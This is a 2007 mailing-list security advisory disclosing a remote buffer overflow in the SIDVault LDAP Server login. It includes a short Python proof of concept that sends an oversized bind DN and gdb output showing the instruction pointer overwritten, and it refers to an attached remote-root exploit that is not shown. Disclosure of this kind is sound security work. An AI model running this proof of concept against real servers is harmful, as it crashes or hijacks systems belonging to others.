[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <1188089411.19897.13.camel@localhost>
Date: Sun, 26 Aug 2007 02:50:11 +0200
From: Joxean Koret <joxeankoret@...oo.es>
To: Full Disclosure <full-disclosure@...ts.grok.org.uk>,
Security Tracker <bugs@...uritytracker.com>,
bugtraq@...urityfocus.com
Subject: SIDVault LDAP Server Remote Buffer Overflow
SIDVault LDAP Server Remote Buffer Overflow
===========================================
Product Description:
SIDVault LDAP Server for Win32 and GNU/Linux
SIDVault is a Simple Integration Database, allowing easy management and
installations with high performance LDAP v3 server. It supports any
number of schemas, easy to add/modify existing schemas, integrated web
based user access, and fast browser based administration tools. Supports
all relevant RFC protocols LDAP v2, LDAP v3, HTTP, ILS.
Vulnerable versions:
Win32 2.0e
Linux 2.0d
Vulnerability Details:
The login mechanism is prone to multiple buffer-overflow vulnerabilities
because it fails to adequately bounds-check user-supplied input before
copying it to an insufficiently sized buffer.
Successfully exploiting the issue will allow an attacker to execute
arbitrary code with root or SYSTEM-level privileges depending on the
operative system target. Failed exploit attempts will result in a
denial-of-service condition.
Proof of concept:
# gdb /usr/local/sidvault/sidvault
(...)
(gdb) r -run
In another terminal:
$ cat poc.py
import ldap
l = ldap.open("localhost")
l.simple_bind("dc=" + "A"*4099, "B"*256)
$ ./poc.py
In the first terminal:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1226736720 (LWP 5942)]
0x41414141 in ?? ()
(gdb) where
#0 0x41414141 in ?? ()
#1 0x41414141 in ?? ()
(...)
Quit
(gdb) i r
eax 0x8202c48 136326216
ecx 0x0 0
edx 0xb6e164df -1226742561
ebx 0x41414141 1094795585
esp 0xb6e16500 0xb6e16500
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141
Exploit:
An exploit for Debian based distributions which spawns a remote root
terminal has been writen. See the attached exploit.
Patch information:
The problem is solved in the latest version (2.0f) which is available in
the vendor's website at http://www.alphacentauri.co.nz/.
Thanks:
Thanks to Lynden Sherriff from Alphacentauri Ltd., he where very kind
and professional.
Disclaimer:
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Contact:
Joxean Koret - joxeankoret[at]yahoo[dot]es
View attachment "exploit.py" of type "text/x-python" (1723 bytes)
Download attachment "signature.asc" of type "application/pgp-signature" (192 bytes)
Powered by blists - more mailing lists